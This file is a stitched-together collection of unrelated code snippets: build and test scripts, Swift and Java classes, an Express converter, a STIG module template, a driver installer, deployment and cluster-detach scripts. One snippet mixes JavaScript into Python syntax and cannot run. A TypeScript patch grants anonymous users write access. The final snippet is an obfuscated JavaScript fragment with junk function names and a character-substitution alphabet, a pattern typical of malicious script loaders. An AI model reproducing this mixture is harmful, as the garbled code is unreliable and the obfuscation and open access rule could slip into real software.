# (the diff fails the script if the hand-maintained list drifts from reality)
diff -wu <(cat <<< "$nested_order" | sort) <(nested_test_dirs | sort)

for i in $nested_order
do
    echo "=============================" #!
    echo "$i/_scripts/run_tests.sh" #!
    pushd $i > /dev/null
    ./_scripts/run_tests.sh
    popd > /dev/null
done

# TODO come up with a better way of doing mutli-OS-ARCH stuff
GOOS=linux GOARCH=amd64 gobin -m -run myitcv.io/cmd/gg myitcv.io/cmd/protoc
GOOS=darwin GOARCH=amd64 gobin -m -run myitcv.io/cmd/gg myitcv.io/cmd/protoc

# For every Go module (directory containing go.mod): regenerate, check
# formatting, test, vet and tidy. Note: `find` without a path is GNU-specific.
for i in $(find -name go.mod -execdir pwd \;)
do
    echo "=============================" #!
    echo "$i: regular run" #!
    pushd $i > /dev/null
    gobin -m -run myitcv.io/cmd/gg $(subpackages)
    ensure_go_formatted $(sub_git_files | non_gen_go_files)
    ensure_go_gen_formatted $(sub_git_files | gen_go_files)
    go test $(subpackages)
    install_main_go $(subpackages | grep -v myitcv.io/cmd/gg/internal/go)
    go vet $(subpackages)
    go mod tidy
    # TODO: remove once we drop Go 1.11 support
    go list all > /dev/null
    popd > /dev/null
done

./_scripts/update_readmes.sh

if [ $(running_on_ci_server) == "yes" ]
then
    verifyGoGet myitcv.io/cmd/concsh
fi
|
/// Spy that replaces the true implementation of `requestWhenInUseAuthorization`
/// via Objective-C method swizzling.
class LocationManagerSpy: CLLocationManager {
    /// When true, intercepted calls are forwarded to the captured original
    /// implementation; when false the spy only intercepts.
    /// BUG FIX: this flag was referenced by spyRequestWhenInUseAuthorization()
    /// but never declared, so the class did not compile.
    static var forwardsInvocations = false

    /// Optional hook holding the original behavior to forward to.
    static var originalRequestWhenInUseAuthorization: (() -> Void)?

    // NOTE(review): `load()` is an Objective-C runtime entry point; a Swift
    // `class func load()` defined here is not guaranteed to be invoked by the
    // runtime — confirm swizzleRequestWhenInUseAuthorization() is also called
    // explicitly (e.g. from test setup).
    override class func load() {
        swizzleRequestWhenInUseAuthorization()
    }

    /// Swaps CLLocationManager.requestWhenInUseAuthorization with the spy.
    private class func swizzleRequestWhenInUseAuthorization() {
        let originalSelector = #selector(CLLocationManager.requestWhenInUseAuthorization)
        let swizzledSelector = #selector(LocationManagerSpy.spyRequestWhenInUseAuthorization)
        guard let originalMethod = class_getInstanceMethod(CLLocationManager.self, originalSelector),
              let swizzledMethod = class_getInstanceMethod(LocationManagerSpy.self, swizzledSelector) else {
            return
        }
        // If the superclass only inherited the method, add our implementation
        // under the original selector; otherwise exchange the two IMPs.
        let didAddMethod = class_addMethod(CLLocationManager.self, originalSelector, method_getImplementation(swizzledMethod), method_getTypeEncoding(swizzledMethod))
        if didAddMethod {
            class_replaceMethod(CLLocationManager.self, swizzledSelector, method_getImplementation(originalMethod), method_getTypeEncoding(originalMethod))
        } else {
            method_exchangeImplementations(originalMethod, swizzledMethod)
        }
    }

    @objc private dynamic func spyRequestWhenInUseAuthorization() {
        if LocationManagerSpy.forwardsInvocations {
            LocationManagerSpy.originalRequestWhenInUseAuthorization?()
        } else {
            // Custom behavior for intercepting the true implementation
            print("Intercepted requestWhenInUseAuthorization")
            // Add custom behavior here
        }
    }
}
/**
*
*/
package jframe.core.plugin;
import jframe.core.msg.Msg;
import jframe.core.msg.PluginMsg;
import jframe.core.plugin.annotation.Message;
import jframe.core.plugin.annotation.MsgInterest;
import jframe.core.plugin.annotation.MsgRecv;
/**
 * Base class for plugins that receive dispatched messages. Subclasses declare
 * which messages they care about via {@link #canRecvMsg(Msg)} and handle them
 * in {@link #doRecvMsg(Msg)}.
 *
 * @author dzh
 * @date Oct 14, 2013 7:53:25 AM
 * @since 1.0
 */
@Message(isRecver = true)
public abstract class PluginRecver extends DefPlugin {

    public PluginRecver() {
        super();
    }

    /*
     * (non-Javadoc)
     *
     * @see jframe.core.dispatch.DispatchTarget#receive(jframe.core.msg.Msg)
     */
    @MsgRecv
    public void receive(Msg<?> msg) {
        doRecvMsg(msg);
    }

    /**
     * Handles a message this plugin has accepted via {@link #interestMsg(Msg)}.
     *
     * @param msg the received message
     */
    abstract protected void doRecvMsg(Msg<?> msg);

    /**
     * Message meta key ("PluginId") — part of the message's meta information.
     */
    public static final String MSG_PLUGIN_ID = "PluginId";

    /*
     * (non-Javadoc)
     *
     * @see jframe.core.dispatch.DispatchTarget#interestMsg(jframe.core.msg.Msg)
     */
    @MsgInterest
    public boolean interestMsg(Msg<?> msg) {
        // Reject: null messages, messages while this plugin is stopped, and
        // messages this plugin sent itself (sender name equals our own name).
        if (msg == null || PluginStatus.STOP == getStatus() || getName().equals(msg.getMeta(PluginMsg.PluginName)))
            return false;
        return canRecvMsg(msg);
    }

    /**
     * @param msg candidate message
     * @return true if this plugin wants {@code msg} delivered to it
     */
    abstract protected boolean canRecvMsg(Msg<?> msg);
}
|
# building the graph (OTP analyst mode; inputs read from --basePath)
java -Xmx8G -jar otp.jar --build /path/to/dir --basePath /home/ja/Dropbox/work/canada_access/a_mon --analyst

# for localhosting and testing (serves the freshly built graph from memory)
java -Xmx8G -jar otp.jar --build /path/to/dir --inMemory --analyst

# running a jython command (8 GB JVM heap; otp.jar on the Jython module path)
jython -J-Xmx8g -Dpython.path=otp.jar t1.py

# setting up a graph folder in the layout OTP expects: graphs/<router-id>/Graph.obj
mkdir graphs
cd graphs
mkdir g
cd ..
mv Graph.obj graphs/g/
|
import ModuleAccessPolicy from '../../../shared/modules/AccessPolicy/ModuleAccessPolicy';
import ModuleDAO from '../../../shared/modules/DAO/ModuleDAO';
import MaintenanceVO from '../../../shared/modules/Maintenance/vos/MaintenanceVO';
import PostModulesPoliciesPatchBase from '../PostModulesPoliciesPatchBase';
/**
 * Post-modules patch: activates the insert/update access policy for
 * MaintenanceVO records.
 *
 * NOTE(review): the policy is granted to ROLE_ANONYMOUS, i.e. unauthenticated
 * users would be able to insert/update maintenance records — confirm this is
 * intentional before deploying.
 */
export default class Patch20201218AddMaintenanceCreationPolicy extends PostModulesPoliciesPatchBase {

    // Lazily-created singleton accessor.
    public static getInstance(): Patch20201218AddMaintenanceCreationPolicy {
        if (!Patch20201218AddMaintenanceCreationPolicy.instance) {
            Patch20201218AddMaintenanceCreationPolicy.instance = new Patch20201218AddMaintenanceCreationPolicy();
        }
        return Patch20201218AddMaintenanceCreationPolicy.instance;
    }

    private static instance: Patch20201218AddMaintenanceCreationPolicy = null;

    // Private: use getInstance(). The base class is keyed on the patch name.
    private constructor() {
        super('Patch20201218AddMaintenanceCreationPolicy');
    }

    /**
     * Activates the INSERT_OR_UPDATE DAO policy on MaintenanceVO for the
     * anonymous role, using the id maps resolved by the base class.
     */
    protected async do_policies_activations(
        roles_ids_by_name: { [role_name: string]: number },
        policies_ids_by_name: { [policy_name: string]: number }) {

        await this.activate_policies(
            policies_ids_by_name[ModuleDAO.getInstance().getAccessPolicyName(ModuleDAO.DAO_ACCESS_TYPE_INSERT_OR_UPDATE, MaintenanceVO.API_TYPE_ID)],
            [
                roles_ids_by_name[ModuleAccessPolicy.ROLE_ANONYMOUS],
            ]);
    }
}
#!/usr/bin/env bash
# BUG FIX: the script uses bash arrays (BTCVER below), which are not POSIX sh;
# under the previous "#!/bin/sh" shebang the array syntax is an error on
# systems where sh is dash or another strict POSIX shell.

# Generates man pages for the daemon/CLI/tx/Qt binaries with help2man.
TOPDIR=${TOPDIR:-$(git rev-parse --show-toplevel)}
SRCDIR=${SRCDIR:-$TOPDIR/src}
MANDIR=${MANDIR:-$TOPDIR/doc/man}

BITCOIND=${BITCOIND:-$SRCDIR/wolfcoind}
BITCOINCLI=${BITCOINCLI:-$SRCDIR/wolfcoin-cli}
BITCOINTX=${BITCOINTX:-$SRCDIR/wolfcoin-tx}
BITCOINQT=${BITCOINQT:-$SRCDIR/qt/wolfcoin-qt}

# BUG FIX: quote the path so the check survives spaces in $TOPDIR.
[ ! -x "$BITCOIND" ] && echo "$BITCOIND not found or not executable." && exit 1

# The autodetected version git tag can screw up manpage output a little bit
BTCVER=($($BITCOINCLI --version | head -n1 | awk -F'[ -]' '{ print $6, $7 }'))

# Create a footer file with copyright content.
# This gets autodetected fine for bitcoind if --version-string is not set,
# but has different outcomes for bitcoin-qt and bitcoin-cli.
echo "[COPYRIGHT]" > footer.h2m
$BITCOIND --version | sed -n '1!p' >> footer.h2m

for cmd in $BITCOIND $BITCOINCLI $BITCOINTX $BITCOINQT; do
    cmdname="${cmd##*/}"
    help2man -N --version-string=${BTCVER[0]} --include=footer.h2m -o ${MANDIR}/${cmdname}.1 ${cmd}
    # Strip the "-<git-hash>" suffix from the rendered version string.
    sed -i "s/\\\-${BTCVER[1]}//g" ${MANDIR}/${cmdname}.1
done

rm -f footer.h2m
|
#!/usr/bin/env bash

# Run the Erlay benchmark across a sweep of difference sizes.
# Each entry is "<d>:<s>" — the -d and -s arguments for one run; the estimate
# file name is derived from <d>. Every command is echoed before it executes,
# exactly as before.
pairs="10:0 20:10 30:30 60:60 100:120 200:220 400:420 700:820 1000:1520 1400:2520 2500:3920 4000:6420 8000:10420 10000:18420"

for pair in $pairs; do
    d="${pair%%:*}"
    s="${pair##*:}"
    cmd="./Erlay -n 1000 -d ${d} -s ${s} -u 100000 -e ../test-sets/diff_estimates_with_tow_${d}_128_9012.txt -r 1.38"
    echo "${cmd}"
    ${cmd}
done
|
require('es6-promise').polyfill();
require('isomorphic-fetch');
var Application = require('./lib/core/application'),
Routes = require('./routes.jsx'),
TasksService = require('./services/tasks'),
HackerNewsService = require('./services/hackernews'),
PackageSuggestionsService = require('./services/package-suggestions'),
TaskStore = require('./stores/tasks'),
HackerNewsStore = require('./stores/hackernews'),
PackageSuggestionsStore = require('./stores/package-suggestions'),
createTaskAction = require('./actions/tasks/create'),
removeTaskAction = require('./actions/tasks/remove'),
updateTaskAction = require('./actions/tasks/update'),
showTasksAction = require('./actions/tasks/show'),
filterTasksAction = require('./actions/tasks/filter'),
searchHackerNewsAction = require('./actions/hackernews/search'),
searchHotelUrbanoAction = require('./actions/hotel-urbano/search');
module.exports = function() {
//This will be de app instance, available everywhere
var app = new Application();
//Setting the routes
app.setRoutes(Routes(app));
//Adding the app services
app.addService(TasksService(app));
app.addService(HackerNewsService(app));
app.addService(PackageSuggestionsService(app));
//Adding the app stores
app.addStore(new TaskStore());
app.addStore(new HackerNewsStore());
app.addStore(new PackageSuggestionsStore());
//Adding the app actions
app.addAction(createTaskAction);
app.addAction(removeTaskAction);
app.addAction(updateTaskAction);
app.addAction(showTasksAction);
app.addAction(filterTasksAction);
app.addAction(searchHackerNewsAction);
app.addAction(searchHotelUrbanoAction);
return app;
}; |
#!/bin/bash
# Slurm batch job: one Double-DDPG training run (CPU TensorFlow virtualenv)
# on RoboschoolInvertedDoublePendulum-v1 with seed 1, action-noise
# exploration and hard target-network copies.
#SBATCH --account=def-dkulic
#SBATCH --mem=8000M                     # memory per node
#SBATCH --time=23:00:00                 # time (DD-HH:MM)
#SBATCH --output=/project/6001934/lingheng/Double_DDPG_Job_output/continuous_RoboschoolInvertedDoublePendulum-v1_doule_ddpg_hardcopy_action_noise_seed1_run6_%N-%j.out # %N for node name, %j for jobID

# Toolchain modules required by roboschool/TensorFlow on this cluster.
module load qt/5.9.6 python/3.6.3 nixpkgs/16.09 gcc/7.3.0 boost/1.68.0 cuda cudnn
source ~/tf_cpu/bin/activate

python ./ddpg_discrete_action.py --env RoboschoolInvertedDoublePendulum-v1 --random-seed 1 --exploration-strategy action_noise --summary-dir ../Double_DDPG_Results_no_monitor/continuous/RoboschoolInvertedDoublePendulum-v1/doule_ddpg_hardcopy_action_noise_seed1_run6 --continuous-act-space-flag --target-hard-copy-flag
|
// Copyright (c) 2021 MC-Market (Mick Capital Pty. Ltd.)
// MIT License (https://github.com/MC-Market-org/js-api-wrapper/blob/main/LICENSE)
const wrapper = require("../mcm-js-api-wrapper");
const token = {
type: "Private",
value: "Find API Key @ https://www.mc-market.org/account/api",
};
let resource_id = 3;
/**
 * Deletes every non-current version of the configured resource.
 * Exits the process (code 0, matching the original behavior) on any API error.
 */
async function main() {
    // Initialise wrapper and exit if a failure occurs.
    let init = await wrapper.init(token);
    if (init.result === "error") {
        console.log(init.error);
        process.exit(0);
    }

    let versions = await wrapper.resources.versions.list_all(resource_id);
    if (versions.result === "error") {
        console.log(versions.error);
        process.exit(0);
    }

    // The current version cannot be deleted so we remove it from the returned list of versions.
    versions.data.shift();

    // BUG FIX: iterate the version objects with for...of instead of for...in
    // (for...in walks array indices and any enumerable prototype additions).
    // Deletions stay sequential on purpose so the API is not hammered.
    for (const version of versions.data) {
        const version_id = version.version_id;
        let res = await wrapper.resources.versions.delete(resource_id, version_id);
        if (res.result === "error") {
            console.log(res.error);
            process.exit(0);
        }
        console.log("Successfully deleted version with id: " + version_id);
    }
}

// Surface unexpected rejections instead of leaving the promise floating.
main().catch((err) => {
    console.error(err);
    process.exit(1);
});
|
var express = require("express");
var app = express();

// NOTE(review): all three route paths contain a literal space
// ("/convert/ Kelvin/..."), so clients must encode it as %20. Kept unchanged
// to preserve the public URLs — confirm whether the space is intentional.

// K -> °F: F = K * 9/5 - 459.67
app.get("/convert/ Kelvin/Fahrenheit/:value", (req, res) => {
  // Route params are strings; convert explicitly before doing arithmetic.
  const kelvin = Number(req.params.value);
  const fahrenheit = (kelvin * 9) / 5 - 459.67;
  res.send(`${fahrenheit} Fahrenheit`);
});

// °C -> °F: F = C * 9/5 + 32
app.get("/convert/ Celsius/Fahrenheit/:value", (req, res) => {
  const celsius = Number(req.params.value);
  const fahrenheit = (celsius * 9) / 5 + 32;
  res.send(`${fahrenheit} Fahrenheit`);
});

// °F -> K: K = (F + 459.67) * 5/9
app.get("/convert/ Fahrenheit/Kelvin/:value", (req, res) => {
  // BUG FIX: the param was used as a raw string, so `fahrenheit + 459.67`
  // concatenated ("100" + 459.67 -> "100459.67") instead of adding.
  const fahrenheit = Number(req.params.value);
  const kelvin = ((fahrenheit + 459.67) * 5) / 9;
  res.send(`${kelvin} Kelvin`);
});

app.listen(3000);
/**
 * Best-effort validation of an arithmetic expression string.
 * Checks: only arithmetic characters, balanced parentheses, no operator at
 * the start / end / directly after "(" / directly after another operator,
 * and finally that the expression evaluates without throwing.
 *
 * Note: evaluation does NOT reject division by zero — in JS `1/0` evaluates
 * to Infinity without throwing.
 */
function isValidMathExpression(expression) {
  const operators = new Set(['+', '-', '*', '/']);

  // SECURITY: the expression is ultimately passed to eval(), so restrict it
  // to digits, operators, parentheses, dots and spaces first.
  if (!/^[0-9+\-*\/(). ]*$/.test(expression)) {
    return false;
  }

  let depth = 0;
  let prev = null; // previous non-space character

  for (const char of expression) {
    if (char === ' ') {
      continue;
    }
    if (char === '(') {
      depth += 1;
    } else if (char === ')') {
      if (depth === 0) {
        return false; // Unbalanced parentheses
      }
      depth -= 1;
    } else if (operators.has(char)) {
      // BUG FIX: the original consulted the parenthesis stack here, so ANY
      // operator outside parentheses (e.g. "1+2") was rejected. Instead,
      // reject an operator at the start, after "(", or after an operator.
      if (prev === null || prev === '(' || operators.has(prev)) {
        return false;
      }
    }
    prev = char;
  }

  if (depth !== 0) {
    return false; // Unbalanced parentheses
  }
  if (prev !== null && operators.has(prev)) {
    return false; // Expression ends with an operator
  }

  try {
    eval(expression); // Safe-ish: input already restricted to arithmetic characters
  } catch (error) {
    return false; // Syntactically invalid expression
  }
  return true; // All checks passed, expression is valid
}

// Test cases (expected outputs corrected: the first expression is unbalanced)
console.log(isValidMathExpression("((8*2)-(6/3)")); // Output: false
console.log(isValidMathExpression("5+7*(")); // Output: false
#!/bin/bash

# stigadm module template: validates (and eventually remediates) one STIG
# rule; see the metadata footer for the rule identifiers.

# Module specific variables go here
#  Files: file=/path/to/file
#  Arrays: declare -a array_name
#  Strings: foo="bar"
#  Integers: x=9

###############################################
# Bootstrapping environment setup
###############################################

# Get our working directory
cwd="$(pwd)"

# Define our bootstrapper location
bootstrap="${cwd}/tools/bootstrap.sh"

# Bail if it cannot be found
if [ ! -f ${bootstrap} ]; then
    echo "Unable to locate bootstrap; ${bootstrap}" && exit 1
fi

# Load our bootstrap (provides gen_epoch, gen_date, report, percent, etc.)
source ${bootstrap}

###############################################
# Metrics start
###############################################

# Get EPOCH
s_epoch="$(gen_epoch)"

# Create a timestamp
timestamp="$(gen_date)"

# Who is calling? 0 = standalone invocation, non-zero = invoked by stigadm as
# part of a group run (changes how the report is emitted below)
caller=$(ps $PPID | grep -c stigadm)

###############################################
# Perform restoration
###############################################

# If ${restore} = 1 go to restoration mode
if [ ${restore} -eq 1 ]; then
    report "Not yet implemented" && exit 1
fi

###############################################
# STIG validation/remediation
###############################################

# Module specific validation code should go here
#  Errors should go in ${errors[@]} array (which on remediation get handled)
#  All inspected items should go in ${inspected[@]} array

# Placeholder: until implemented, the module always reports its own stigid as
# an error so it shows up as failed rather than silently passing.
errors=("${stigid}")

# If ${change} = 1
#if [ ${change} -eq 1 ]; then

# Create the backup env
#backup_setup_env "${backup_path}"

# Create a backup (configuration output, file/folder permissions output etc.)
#bu_configuration "${backup_path}" "${author}" "${stigid}" "$(echo "${array_values[@]}" | tr ' ' '\n')"
#bu_file "${backup_path}" "${author}" "${stigid}" "${file}"
#if [ $? -ne 0 ]; then

# Stop, we require a backup
#report "Unable to create backup" && exit 1
#fi

# Iterate ${errors[@]}
#for error in ${errors[@]}; do

# Work to remediate ${error} should go here
#done
#fi

# Remove dupes
#inspected=( $(remove_duplicates "${inspected[@]}") )

###############################################
# Results for printable report
###############################################

# If ${#errors[@]} > 0
if [ ${#errors[@]} -gt 0 ]; then

    # Set ${results} error message
    #results="Failed validation" UNCOMMENT ONCE WORK COMPLETE!
    results="Not yet implemented!"
fi

# Set ${results} passed message
[ ${#errors[@]} -eq 0 ] && results="Passed validation"

###############################################
# Report generation specifics
###############################################

# Apply some values expected for report footer
[ ${#errors[@]} -eq 0 ] && passed=1 || passed=0
[ ${#errors[@]} -gt 0 ] && failed=1 || failed=0

# Calculate a percentage from applied modules & errors incurred
percentage=$(percent ${passed} ${failed})

# If the caller was only independent (standalone run)
if [ ${caller} -eq 0 ]; then

    # Show failures
    [ ${#errors[@]} -gt 0 ] && print_array ${log} "errors" "${errors[@]}"

    # Provide detailed results to ${log}
    if [ ${verbose} -eq 1 ]; then

        # Print array of failed & validated items
        [ ${#inspected[@]} -gt 0 ] && print_array ${log} "validated" "${inspected[@]}"
    fi

    # Generate the report
    report "${results}"

    # Display the report
    cat ${log}
else

    # Since we were called from stigadm
    module_header "${results}"

    # Show failures
    [ ${#errors[@]} -gt 0 ] && print_array ${log} "errors" "${errors[@]}"

    # Provide detailed results to ${log}
    if [ ${verbose} -eq 1 ]; then

        # Print array of failed & validated items
        [ ${#inspected[@]} -gt 0 ] && print_array ${log} "validated" "${inspected[@]}"
    fi

    # Finish up the module specific report
    module_footer
fi

###############################################
# Return code for larger report
###############################################

# Return an error/success code (0/1)
exit ${#errors[@]}
# Date: 2018-09-06
#
# Severity: CAT-I
# Classification: UNCLASSIFIED
# STIG_ID: V0072005
# STIG_Version: SV-86629r2
# Rule_ID: RHEL-07-020310
#
# OS: Red_Hat
# Version: 7
# Architecture:
#
# Title: The Red Hat Enterprise Linux operating system must be configured so that the root account must be the only account having unrestricted access to the system.
# Description: If an account other than root also has a User Identifier (UID) of "0", it has root authority, giving that account unrestricted access to the entire operating system. Multiple accounts with a UID of "0" afford an opportunity for potential intruders to guess a password for a privileged account.
|
#!/bin/sh
# Copyright 2012-2016 by Kvaser AB, Molndal, Sweden
# http://www.kvaser.com
#
# This software is dual licensed under the following two licenses:
# BSD-new and GPLv2. You may use either one. See the included
# COPYING file for details.
#
# License: BSD-new
# ===============================================================================
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#
# License: GPLv2
# ===============================================================================
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ---------------------------------------------------------------------------
MODNAME=mhydra

# Locate helper binaries; depending on the udev generation only one of
# udevcontrol/udevadm may exist.
DEPMOD=$(which depmod)
UDEVCTRL=$(which udevcontrol)
UDEVADM=$(which udevadm)
UDEVD=$(which udevd)

# Install the kernel module into the running kernel's module tree.
install -D -m 644 "$MODNAME.ko" "/lib/modules/$(uname -r)/kernel/drivers/usb/misc/$MODNAME.ko"
if [ "$?" -ne 0 ] ; then
  exit 1
fi

# Install the helper script referenced by the udev rule.
install -m 755 "$MODNAME.sh" /usr/sbin/
if [ "$?" -ne 0 ] ; then
  exit 1
fi

# Install the udev rule that creates the device nodes.
install -m 644 ../10-kvaser.rules /etc/udev/rules.d
if [ "$?" -ne 0 ] ; then
  exit 1
fi

# Reload the udev rules. Old udev (< 128) uses udevcontrol; newer versions
# use udevadm. When udevd itself is absent, assume the modern tooling.
if [ -z "$UDEVD" ] ; then
  $UDEVADM control --reload-rules ;
else
  # Use the resolved $UDEVD binary (the original invoked a bare `udevd`,
  # which may not be on PATH even though `which udevd` succeeded).
  if [ "$($UDEVD --version)" -lt 128 ] ; then
    $UDEVCTRL reload_rules ;
  else
    $UDEVADM control --reload-rules ;
  fi
fi

# Rebuild module dependency data so modprobe can find the new module.
$DEPMOD -a
if [ "$?" -ne 0 ] ; then
  echo "Failed to execute $DEPMOD -a"
fi
|
# Load the deployment configuration; fall back to the default home dir.
source /etc/dsqp/opal_poll.config
QP_HOME_DIR=${QP_HOME_DIR:-"$HOME/ds_deployment"}

# Ensure docker is available before anything else.
if [[ $(which docker) ]]; then
    echo "docker already installed, version is: "
    docker -v
else
    echo "docker not installed, installing docker:"
    # NOTE(review): this hard-codes ~/ds_deployment rather than $QP_HOME_DIR;
    # left unchanged because the later relative ./ invocations rely on the
    # caller's working directory -- confirm before unifying.
    cd ~/ds_deployment/ds_develop
    ./install_docker.sh
fi

# Pull production images from a private registry when one is configured.
if [[ -n $QP_DOCKER_REGISTRY_PREFIX ]]; then
    printf "**** registry found, pulling images from %s ...\n\n" "$QP_DOCKER_REGISTRY_PREFIX"
    ./pullPollProdImages.sh "$QP_DOCKER_REGISTRY_PREFIX" "$QP_DOCKER_REGISTRY_USER" "$QP_DOCKER_REGISTRY_PW"
fi

# Remove per-user config copies; canonical config lives in /etc/dsqp/.
printf "\n Removing config folders and files from home directory %s - you can find your config files here /etc/dsqp/ \n" "$QP_HOME_DIR"
rm -rf "$QP_HOME_DIR/auth"
rm -rf "$QP_HOME_DIR/miracum_users"
rm -f "$QP_HOME_DIR/opal_poll.config"

# Restart the production stack.
docker-compose -f docker-compose.poll.prod.yml down
./start_prod.sh

printf "\n the first time opal starts it takes a while to be ready as we are loading test data and configuring the servers for you, so please be patient\n"
printf "\n - visit %s:8443 in your browser to access the poll server user interface \n" "$OPAL_SERVER_IP"
printf "\n - visit https://%s:443 in your browser to access the opal server user interface \n" "$OPAL_SERVER_IP"
|
"""
Modifying this JavaScript code to calculate the power of a given number
"""
function pow(base,power) {
let result = 1;
for(let i=1; i<=power; i++) {
result *= base;
}
return result;
}
if __name__ == '__main__':
base = 4;
power = 3;
result = pow(base, power);
console.log("Result:", result); |
#!/bin/bash
###############################################################################
# Copyright (c) Red Hat, Inc.
# Copyright Contributors to the Open Cluster Management project
###############################################################################
# Require the managed-cluster name as the first argument.
# Quoted "$1" so an empty or space-containing argument cannot break the test.
if [ -z "$1" ]; then
    echo "please set the cluster name"
    exit 1
fi

CLUSTERNAME="$1"
# Detach (and, when Hive-provisioned, destroy) one managed cluster.
# Expects ${CLUSTERNAME} to be set by the caller; may run as a background job.
function destroyOrDetach {
    # Pause the klusterletaddonconfig controller so it does not recreate the
    # addon manifestworks we are about to delete.
    oc annotate klusterletaddonconfig -n ${CLUSTERNAME} ${CLUSTERNAME} klusterletaddonconfig-pause=true --overwrite=true
    # Remove each addon agent's manifestwork without waiting for completion.
    oc delete manifestwork -n ${CLUSTERNAME} ${CLUSTERNAME}-appmgr --wait=false
    oc delete manifestwork -n ${CLUSTERNAME} ${CLUSTERNAME}-certpolicyctrl --wait=false
    oc delete manifestwork -n ${CLUSTERNAME} ${CLUSTERNAME}-iampolicyctrl --wait=false
    oc delete manifestwork -n ${CLUSTERNAME} ${CLUSTERNAME}-policyctrl --wait=false
    oc delete manifestwork -n ${CLUSTERNAME} ${CLUSTERNAME}-search --wait=false
    oc delete manifestwork -n ${CLUSTERNAME} ${CLUSTERNAME}-workmgr --wait=false
    # Give the work agent time to process the deletions -- presumably 60s was
    # found sufficient empirically; TODO confirm.
    sleep 60
    oc delete klusterletaddonconfig --wait=false -n ${CLUSTERNAME} ${CLUSTERNAME}
    # Un-pause so the deletion above can be reconciled to completion.
    oc annotate klusterletaddonconfig -n ${CLUSTERNAME} ${CLUSTERNAME} klusterletaddonconfig-pause=false --overwrite=true
    sleep 30
    # A clusterdeployment in the namespace means Hive provisioned this
    # cluster: destroy it rather than just detaching.
    oc get clusterdeployment -n ${CLUSTERNAME} ${CLUSTERNAME}
    if [ $? -eq 0 ]; then
        echo "Detected clusterdeployment. Destroying"
        oc delete clusterdeployment -n ${CLUSTERNAME} ${CLUSTERNAME} --wait=false
        # Poll up to 180 * 20s = 1 hour for the destroy to complete.
        for i in `seq 1 180`; do
            echo "waiting clusterdeployment to be deleted"
            sleep 20
            oc get clusterdeployment -n ${CLUSTERNAME} ${CLUSTERNAME} || break ;
        done
    fi
    # Detach the cluster, then clear finalizers that could otherwise leave
    # the managedcluster stuck in Terminating.
    oc delete managedcluster ${CLUSTERNAME} --wait=false
    sleep 60
    oc patch managedcluster ${CLUSTERNAME} -p '{"metadata":{"finalizers":[]}}' --type=merge
    # Same pattern for the work-agent RBAC objects: delete, wait briefly,
    # then strip finalizers so deletion cannot hang.
    oc -n ${CLUSTERNAME} delete rolebinding.authorization.openshift.io/${CLUSTERNAME}:managed-cluster-work --wait=false
    sleep 10
    oc -n ${CLUSTERNAME} patch rolebinding.authorization.openshift.io ${CLUSTERNAME}:managed-cluster-work -p '{"metadata":{"finalizers":[]}}' --type=merge
    oc -n ${CLUSTERNAME} delete role.authorization.openshift.io/${CLUSTERNAME}:managed-cluster-work --wait=false
    sleep 10
    oc -n ${CLUSTERNAME} patch role.authorization.openshift.io/${CLUSTERNAME}:managed-cluster-work -p '{"metadata":{"finalizers":[]}}' --type=merge
    # Ends the enclosing (sub)shell; when the function runs as a background
    # job this terminates only that job, not the parent script.
    exit
}
# With the literal name 'all', detach/destroy every managed cluster in
# parallel background jobs; otherwise handle the single named cluster.
# ${CLUSTERNAME} is quoted -- the original's bare expansion broke the test
# when the value was empty or contained glob characters.
if [ "${CLUSTERNAME}" = 'all' ]; then
    pids=()
    for c in $(oc get managedcluster -otemplate --template='{{range .items}}{{printf "%s\n" .metadata.name}}{{end}}') ; do
        CLUSTERNAME=${c}
        echo destroyOrDetach ${CLUSTERNAME}
        destroyOrDetach &
        pids+=($!)
    done
    # Wait for every background detach to finish before exiting.
    for pid in "${pids[@]}"; do
        wait "$pid"
    done
else
    destroyOrDetach
fi
|
<reponame>hafizalfaza/rrssrbp<gh_stars>0
/* @flow */
import styled from 'styled-components'
// A flex container that scrolls along its main axis.
// `orientation` prop: 'vertical' lays children out in a column and allows
// only vertical scrolling; any other value lays them out in a row and
// allows only horizontal scrolling.
export const ScrollView = styled.div`
  display: flex;
  flex-direction: ${({ orientation }) => (orientation === 'vertical' ? 'column' : 'row')};
  overflow-x: ${({ orientation }) => (orientation === 'vertical' ? 'hidden' : 'auto')};
  overflow-y: ${({ orientation }) => (orientation === 'horizontal' ? 'hidden' : 'auto')};
`

export default ScrollView
|
// Obfuscation thunk: always yields the method name "charAt"; the argument
// is ignored. Used by taImARE() to index the substitution alphabet.
function AqFXJ(EoeUOV)
{
    var methodName = "charAt";
    return methodName;
}
// First third (32 chars) of the 95-character substitution alphabet
// consumed by taImARE().
function GzH()
{
    return "YkuOKC7i{\"GUy%x}2c9N*Q+8tneM[`S^";
}
